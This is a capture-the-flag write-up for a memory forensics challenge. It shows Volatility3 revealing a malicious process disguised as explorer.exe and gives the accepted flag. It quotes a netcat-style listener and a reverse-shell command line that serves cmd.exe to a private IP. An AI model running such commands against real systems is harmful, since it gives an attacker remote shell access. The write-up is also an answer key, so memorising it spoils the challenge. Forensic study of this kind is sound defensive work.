Commands

Challenge:

What was the command used with the malicious explorer.exe? Submit the entire command as the flag: flag{program.exe --options argument}.

Use the file from Captured Memories.

Solution:

From the previous challenge, Evil Twin, I knew there were two suspicious explorer.exe processes, PIDS 5448 and 3100. I used Volatility3's CmdLine plugin to extract the command line arguments from each process:

$ vol.py -qf mem.raw windows.cmdline.CmdLine --pid 5448

5448	explorer.exe	explorer.exe  -lnvp 6666

$ vol.py -qf mem.raw windows.cmdline.CmdLine --pid 3100

3100	explorer.exe	explorer.exe  192.168.1.157 6666 -e cmd.exe

The wording of the challenge description suggests that the was a single malicious explorer.exe process when in fact there are two, so I tried submitting both and the accepted flag was, flag{explorer.exe 192.168.1.157 6666 -e cmd.exe}.